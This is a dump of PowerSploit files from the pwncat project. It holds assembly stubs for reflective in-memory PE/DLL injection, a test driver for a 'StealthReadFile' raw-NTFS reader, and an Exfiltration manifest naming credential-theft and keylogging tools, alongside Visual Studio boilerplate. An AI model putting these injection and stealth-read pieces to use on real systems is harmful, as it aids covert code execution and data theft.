    mov rbx, rsp                ; rbx keeps the caller's rsp for the restore below
    sub rsp, 0x20               ; 32 bytes of shadow space for the Win64 convention
    and sp, 0xffc0              ; clears the low 6 bits of rsp (64-byte alignment)

    ; Call LoadLibraryA (lpLibFileName in rcx)
    mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS
    mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
    call rdx

    ; rax holds the module handle, or NULL on failure
    mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
    mov [rdx], rax

    ; Fix stack
    mov rsp, rbx
    pop rbx
    ret
24 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
; x86 stub that invokes a loaded DLL's DllMain with DLL_PROCESS_ATTACH.
; DllMain is stdcall, so the three arguments are pushed right to left;
; the callee's stack cleanup does not matter because esp is restored
; from ebx afterwards. The 0x41414141 immediates are placeholders filled
; in by PowerShell.
[SECTION .text]
global _start

_start:
    ; Get stack setup
    push ebx
    mov ebx, esp                ; ebx keeps the caller's esp for the restore below
    and esp, 0xfffffff0         ; 16-byte alignment

    ; Call DllMain
    mov ecx, 0x41414141         ; DLLHandle, set by PowerShell
    mov edx, 0x1                ; PROCESS_ATTACH
    mov eax, 0x0                ; NULL
    push eax                    ; lpReserved
    push edx                    ; fdwReason
    push ecx                    ; hinstDLL
    mov eax, 0x41414141         ; Address of DllMain, set by PS
    call eax

    ; Fix stack
    mov esp, ebx
    pop ebx
    ret
24 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
; x86 stub run when an injected EXE finishes: flags completion to the
; PowerShell side, then terminates only the current thread so the host
; process keeps running. Control never returns from the final call.
; The 0x41414141 immediates are placeholders filled in by PowerShell.
[SECTION .text]
global _start

_start:
    ; Set a var to 1, let PS know the EXE is exiting
    mov ebx, 0x41414141         ; address of the flag byte, set by PS
    mov [ebx], byte 0x01

    ; Call exitthread instead of exit process
    sub esp, 0x20
    and esp, 0xFFFFFFc0         ; Needed for stack alignment (clears the low 6 bits of esp)
    mov ebx, 0x41414141         ; address of the exit-thread routine, set by PS
    call ebx
14 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm:
--------------------------------------------------------------------------------
; x86 stub that resolves an export by name through GetProcAddress and
; writes the resulting address to a buffer for the PowerShell side to
; read back. GetProcAddress is stdcall, so the arguments are pushed right
; to left; esp is restored from ebx afterwards regardless of callee cleanup.
; The 0x41414141 immediates are placeholders filled in by PowerShell.
[SECTION .text]

global _start

_start:
    ; Save state of ebx and stack
    push ebx
    mov ebx, esp                ; ebx keeps the caller's esp for the restore below

    ; Align stack
    and esp, 0xffffffc0         ; clears the low 6 bits of esp (64-byte alignment)

    ; Call GetProcAddress
    mov eax, 0x41414141         ; DllHandle, supplied by PS
    mov ecx, 0x41414141         ; Function name, supplied by PS
    push ecx                    ; lpProcName
    push eax                    ; hModule
    mov eax, 0x41414141         ; GetProcAddress address, supplied by PS
    call eax

    ; Write GetProcAddress return value to an address supplied by PS
    ; (eax holds the resolved address, or NULL on failure)
    mov ecx, 0x41414141         ; Address supplied by PS
    mov [ecx], eax

    ; Fix stack
    mov esp, ebx
    pop ebx
    ret
29 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module CodeExecution`
7 |
8 | To see the commands imported, type `Get-Command -Module CodeExecution`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/Exfiltration.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Exfiltration.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Exfiltration Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Format files (.ps1xml) to be loaded when importing this module
25 | FormatsToProcess = 'Get-VaultCredential.ps1xml'
26 |
27 | # Functions to export from this module
28 | FunctionsToExport = '*'
29 |
30 | # List of all files packaged with this module
31 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
32 | 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
33 | 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
34 | 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',
35 | 'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'
36 |
37 | }
38 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/Exfiltration.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1') | ForEach-Object { . $_.FullName }  # Dot-source every .ps1 beside this manifest into the module scope
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/Get-VaultCredential.ps1xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | VaultItemView
6 |
7 | VAULTCLI.VAULTITEM
8 |
9 |
10 |
11 |
12 |
13 |
14 | Vault
15 |
16 |
17 | Resource
18 |
19 |
20 | Identity
21 |
22 |
23 | Credential
24 |
25 |
26 | PackageSid
27 |
28 |
29 | LastModified
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : LogonUser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this LogonUser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your LogonUser application.
9 |
10 |
11 | LogonUser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | LogonUser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | LogonUser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named LogonUser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // LogonUser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
5 | {
6 |     // No work is done for any attach/detach notification, so the reason code is
7 |     // not inspected; every call simply reports success to the loader.
8 |     (void)hModule;
9 |     (void)ul_reason_for_call;
10 |     (void)lpReserved;
11 |     return TRUE;
12 | }
19 |
20 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // logon.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h"
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 |
24 |
25 | // TODO: reference additional headers your program requires here
26 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32
16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64
17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64
18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32
19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32
20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64
21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_Attribute.h"
21 | #include "NTFS_Common.h"
22 | #include "NTFS_DataType.h"
23 | #include "NTFS_FileRecord.h"
24 |
25 | using namespace std;
26 |
27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);
28 |
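29 | // Test driver: loads NTFSParserDLL.dll, reads c:\test\test.txt through its
30 | // StealthReadFile export and writes the returned bytes to c:\test\test2.txt.
31 | // Returns 0 on success, 1 when the DLL, the export or the output file is unavailable.
32 | int _tmain(int argc, _TCHAR* argv[])
33 | {
34 |     // The DLL is resolved by bare name, so the loader's search order decides which
35 |     // NTFSParserDLL.dll is picked up; a NULL handle must not reach GetProcAddress.
36 |     HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll");
37 |     if (parserDLLHandle == NULL)
38 |     {
39 |         cout << "LoadLibraryA failed: " << GetLastError() << endl;
40 |         return 1;
41 |     }
42 |
43 |     // GetProcAddress returns FARPROC (the old code stored it in a HANDLE); cast it
44 |     // straight to the exported function's signature and refuse to call a NULL.
45 |     StealthReadFile_Func StealthReadFile =
46 |         (StealthReadFile_Func)GetProcAddress(parserDLLHandle, "StealthReadFile");
47 |     if (StealthReadFile == NULL)
48 |     {
49 |         cout << "GetProcAddress failed: " << GetLastError() << endl;
50 |         FreeLibrary(parserDLLHandle);
51 |         return 1;
52 |     }
53 |
54 |     DWORD buffSize = 1024*1024;
55 |     BYTE* buffer = new BYTE[buffSize];
56 |     DWORD bytesRead = 0;
57 |     ULONGLONG bytesLeft = 0;
58 |     DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft);
59 |
60 |     cout << "Return value: " << ret << endl;
61 |
62 |     // Do not trust the callee's byte count beyond the buffer this function owns.
63 |     if (bytesRead > buffSize)
64 |     {
65 |         bytesRead = buffSize;
66 |     }
67 |
68 |     int exitCode = 0;
69 |     ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary);
70 |     if (!myFile)
71 |     {
72 |         cout << "Could not open output file" << endl;
73 |         exitCode = 1;
74 |     }
75 |     else
76 |     {
77 |         myFile.write((char*)buffer, bytesRead);
78 |     }
79 |
80 |     // Release the buffer and the library on every path (the old code leaked both).
81 |     delete[] buffer;
82 |     FreeLibrary(parserDLLHandle);
83 |     return exitCode;
84 | }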
49 |
50 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : NTFSParser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParser application.
9 |
10 |
11 | NTFSParser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 | // TODO: reference additional headers your program requires here
18 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | // dllmain.cpp : Defines the entry point for the DLL application.
19 | #include "stdafx.h"
20 |
21 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
22 | {
23 |     // No work is done for any attach/detach notification, so the reason code is
24 |     // not inspected; every call simply reports success to the loader.
25 |     (void)hModule;
26 |     (void)ul_reason_for_call;
27 |     (void)lpReserved;
28 |     return TRUE;
29 | }
36 |
37 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParserDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 | // TODO: reference additional headers your program requires here
19 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/Exfiltration/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Exfiltration`
7 |
8 | To see the commands imported, type `Get-Command -Module Exfiltration`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed so that they can be run individually. Packaging them in a module simply makes them more portable.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/LICENSE:
--------------------------------------------------------------------------------
1 | PowerSploit is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2012, Matthew Graeber
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
